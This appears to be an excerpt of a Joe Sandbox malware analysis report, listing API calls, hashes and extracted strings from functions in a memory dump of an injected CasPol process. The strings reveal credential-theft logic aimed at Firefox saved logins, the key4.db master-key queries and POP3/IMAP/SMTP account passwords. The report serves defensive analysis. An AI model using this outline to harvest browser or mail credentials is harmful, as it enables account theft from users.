                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • strlen.MSVCRT ref: 004431AD
                                                                                                                                                                                    • strncmp.MSVCRT ref: 004431BD
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000002,00000000,?,?,?,?), ref: 00443239
                                                                                                                                                                                    • atoi.MSVCRT(00000000,?,00000002,00000000,?,?,?,?), ref: 0044324A
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00443276
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiWideatoimemcpystrlenstrncmp
                                                                                                                                                                                    • String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
                                                                                                                                                                                    • API String ID: 1895597112-3210201812
                                                                                                                                                                                    • Opcode ID: 815def950afc24903c06c011c583ca89ddac7a924de85cd770a3f0370a713b87
                                                                                                                                                                                    • Instruction ID: 70136e13f872b1b8ab9f6622f700308096b0d0b5c52b82b67a7483c56e51dea4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 815def950afc24903c06c011c583ca89ddac7a924de85cd770a3f0370a713b87
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4AF10B718012589BDB22CF54C8487DEBBB4BB0278BF5485CAD8597B242C7B85B8DCF58
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: strcmp$_strcmpi$memcpystrlenstrtoul
                                                                                                                                                                                    • String ID: Account_Name$IMAP$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP$NNTP_Email_Address$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP$SMTP_Email_Address$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                                                                                                                                                                                    • API String ID: 1714764973-479759155
                                                                                                                                                                                    • Opcode ID: 7bcc0da50847e261a1cb1e520a2a3ee9008523f466690a5f111f96f1dcf5fefb
                                                                                                                                                                                    • Instruction ID: 3e95309f0516475de87f4a3b36a82bfae981417ea13aa6096d07c622cb899a74
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7bcc0da50847e261a1cb1e520a2a3ee9008523f466690a5f111f96f1dcf5fefb
                                                                                                                                                                                    • Instruction Fuzzy Hash: FB91A9726087056AF224BB36DD43B9F33D8EF4071DF20042FF85AA6182EE6DBA05461D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040EBD8
                                                                                                                                                                                      • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                                                                                                      • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                                                                                                      • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                                                                                                    • memset.MSVCRT ref: 0040EC2B
                                                                                                                                                                                    • memset.MSVCRT ref: 0040EC47
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F26F,000000FF,?,00000104,?,?,?,?,?,?,0040F26F,?,00000000), ref: 0040EC5E
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040F26F,?), ref: 0040EC7D
                                                                                                                                                                                    • memset.MSVCRT ref: 0040ECDD
                                                                                                                                                                                    • memset.MSVCRT ref: 0040ECF2
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000), ref: 0040ED59
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,0040F26F), ref: 0040ED6F
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000), ref: 0040ED85
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 0040ED9B
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 0040EDB1
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 0040EDC7
                                                                                                                                                                                    • memset.MSVCRT ref: 0040EDE1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                                                                                                                                                                                    • String ID: $"$$$$$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                                                                                                                                                                                    • API String ID: 3137614212-1455797042
                                                                                                                                                                                    • Opcode ID: 2f5d5fe8e7071613619405723c2e306f1b068e67b5eb1c199c09519f7d14e143
                                                                                                                                                                                    • Instruction ID: d6da7a2470a9305ce2943739f2db0c21907611b241beb19e2f55b2037bda17a7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2f5d5fe8e7071613619405723c2e306f1b068e67b5eb1c199c09519f7d14e143
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9522A021C047DA9DDB31C6B89C45BCDBB749F16234F0803EAF1A8AB2D2D7345A46CB65
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _strcmpi$strlen$strncmp$atoimemcpy$memset
                                                                                                                                                                                    • String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$mail.smtpserver$port$server$signon.signonfilename$smtpserver$true$type$useSecAuth$useremail$username
                                                                                                                                                                                    • API String ID: 2814039832-2206097438
                                                                                                                                                                                    • Opcode ID: 5e152c395e8870459aa5d43dede1428a4321a50c33a2bf693ec051cd41307c85
                                                                                                                                                                                    • Instruction ID: f11149d289dc999bf060bfe26817f696df6097fe02de34603fea895fe08660a4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e152c395e8870459aa5d43dede1428a4321a50c33a2bf693ec051cd41307c85
                                                                                                                                                                                    • Instruction Fuzzy Hash: 11A1C932804206BAFF14ABA6DD02B9E77A4DF50328F20447FF405B71D1EB79AE55964C
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                                                                                                      • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                                                                                                      • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                                                                                                      • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                                                                                                                                      • Part of subcall function 00408934: CloseHandle.KERNEL32(?), ref: 0040899C
                                                                                                                                                                                      • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                                                                                                                                                    • memset.MSVCRT ref: 0040E5B8
                                                                                                                                                                                    • memset.MSVCRT ref: 0040E5CD
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                                                                                                                                                    • memset.MSVCRT ref: 0040E6B5
                                                                                                                                                                                    • memset.MSVCRT ref: 0040E6CC
                                                                                                                                                                                      • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                                                                                                                                      • Part of subcall function 004066A3: memcmp.MSVCRT ref: 004066EE
                                                                                                                                                                                    • memset.MSVCRT ref: 0040E736
                                                                                                                                                                                    • memset.MSVCRT ref: 0040E74F
                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040E76D
                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040E788
                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040E79E
                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040E7B7
                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040E7D3
                                                                                                                                                                                    • memset.MSVCRT ref: 0040E858
                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040E873
                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040E889
                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040E8A5
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                                                                                                                    • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                                                                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                                                                                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                                                                                                                                                    • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                                                                                                                                                    • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00410487
                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                                                                                                                                                    • GetDC.USER32 ref: 004104E2
                                                                                                                                                                                    • strlen.MSVCRT ref: 00410522
                                                                                                                                                                                    • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                                                                                                                                                    • ReleaseDC.USER32(?,?), ref: 00410580
                                                                                                                                                                                    • sprintf.MSVCRT ref: 00410640
                                                                                                                                                                                    • SetWindowTextA.USER32(?,?), ref: 00410654
                                                                                                                                                                                    • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 004106DD
                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 004106E7
                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00410737
                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                                                                                                                    • String ID: %s:$EDIT$STATIC
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 004024F5
                                                                                                                                                                                      • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000,?,?,?,770145ED,?,00000000), ref: 00402533
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _mbscpy$QueryValuememset
                                                                                                                                                                                    • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • EndDialog.USER32(?,?), ref: 0040FC88
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 0040FCA0
                                                                                                                                                                                    • SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040FCBF
                                                                                                                                                                                    • SendMessageA.USER32(?,00000301,00000000,00000000), ref: 0040FCCC
                                                                                                                                                                                    • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040FCD5
                                                                                                                                                                                    • memset.MSVCRT ref: 0040FCFD
                                                                                                                                                                                    • memset.MSVCRT ref: 0040FD1D
                                                                                                                                                                                    • memset.MSVCRT ref: 0040FD3B
                                                                                                                                                                                    • memset.MSVCRT ref: 0040FD54
                                                                                                                                                                                    • memset.MSVCRT ref: 0040FD72
                                                                                                                                                                                    • memset.MSVCRT ref: 0040FD8B
                                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 0040FD93
                                                                                                                                                                                    • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040FDB8
                                                                                                                                                                                    • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040FDEE
                                                                                                                                                                                    • memset.MSVCRT ref: 0040FE45
                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 0040FE53
                                                                                                                                                                                    • memcpy.MSVCRT(?,00457E70,00000118), ref: 0040FE82
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000), ref: 0040FEA4
                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040FF0F
                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040FF28
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 0040FF32
                                                                                                                                                                                    • SetFocus.USER32(00000000), ref: 0040FF39
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040FF09
                                                                                                                                                                                    • {Unknown}, xrefs: 0040FD02
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
                                                                                                                                                                                    • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                                                                                                                    • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                                                                                                                    • SetCursor.USER32(00000000), ref: 00401166
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                                                                                                                    • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00401226
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00401253
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00401262
                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                                                                                                                                    • memset.MSVCRT ref: 0040128E
                                                                                                                                                                                    • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00409070: LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                                                                                                      • Part of subcall function 00409070: sprintf.MSVCRT ref: 0040909B
                                                                                                                                                                                    • SetMenu.USER32(?,00000000), ref: 0040BD23
                                                                                                                                                                                    • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040BD56
                                                                                                                                                                                    • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040BD6C
                                                                                                                                                                                    • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040BDCC
                                                                                                                                                                                    • LoadIconA.USER32(00000066,00000000), ref: 0040BE3B
                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040BE93
                                                                                                                                                                                    • RegDeleteKeyA.ADVAPI32(80000001,0044C52F), ref: 0040BEA8
                                                                                                                                                                                    • SetFocus.USER32(?), ref: 0040BECE
                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(0045AB10), ref: 0040BEE7
                                                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,0045AB10), ref: 0040BEF7
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040BEFE
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040BF0C
                                                                                                                                                                                    • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040BF68
                                                                                                                                                                                      • Part of subcall function 00404B87: strlen.MSVCRT ref: 00404BA4
                                                                                                                                                                                      • Part of subcall function 00404B87: SendMessageA.USER32(?,0000101B,?,?), ref: 00404BC8
                                                                                                                                                                                    • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040BFB3
                                                                                                                                                                                    • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040BFC6
                                                                                                                                                                                    • memset.MSVCRT ref: 0040BFDB
                                                                                                                                                                                    • SetWindowTextA.USER32(?,?), ref: 0040BFFF
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$Loadstrlen$MenuWindow$AttributesClipboardCreateDeleteFileFocusFormatIconImagePathRegisterTempText_strcmpimemsetsprintf
                                                                                                                                                                                    • String ID: /noloadsettings$SysListView32$commdlg_FindReplace$report.html
                                                                                                                                                                                    • API String ID: 2303586283-933021314
                                                                                                                                                                                    • Opcode ID: c18e167360c9832f76d4060667def10e2fdfd132df2f90ae90de526b0002aaa1
                                                                                                                                                                                    • Instruction ID: 018683a0c001df71ea8fb117e25ab04faf3265e4b472b332b07084323bdedb2f
                                                                                                                                                                                    • Opcode Fuzzy Hash: c18e167360c9832f76d4060667def10e2fdfd132df2f90ae90de526b0002aaa1
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5DC1C071644388FFEB15DF64CC45BDABBA5FF14304F04016AFA44A7292C7B5A904CBA9
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcmp$memcpy
                                                                                                                                                                                    • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                                                                                                                    • API String ID: 231171946-2189169393
                                                                                                                                                                                    • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                                                                                                    • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                                                                                                                    • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                                    • API String ID: 633282248-1996832678
                                                                                                                                                                                    • Opcode ID: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                                                                                                                                    • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00406782
                                                                                                                                                                                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                      • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040685E
                                                                                                                                                                                    • memcmp.MSVCRT ref: 0040686E
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000023,?,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068A1
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 004068BA
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 004068D3
                                                                                                                                                                                    • memcmp.MSVCRT ref: 004068EC
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000015,?), ref: 00406908
                                                                                                                                                                                    • memcmp.MSVCRT ref: 004069B2
                                                                                                                                                                                    • memcmp.MSVCRT ref: 004069CA
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000023,?), ref: 00406A03
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000042,00000010), ref: 00406A1F
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000054,00000020), ref: 00406A3B
                                                                                                                                                                                    • memcmp.MSVCRT ref: 00406A4A
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000015,?), ref: 00406A6E
                                                                                                                                                                                    • memcpy.MSVCRT(?,0000001A,00000020), ref: 00406A86
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • key4.db, xrefs: 00406756
                                                                                                                                                                                    • , xrefs: 00406834
                                                                                                                                                                                    • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                                                                                                                                                                    • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$memcmp$memsetstrlen
                                                                                                                                                                                    • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                                                                                                                                                    • API String ID: 3614188050-3983245814
                                                                                                                                                                                    • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                                                                                                    • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                                                                                                                                                                                    • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
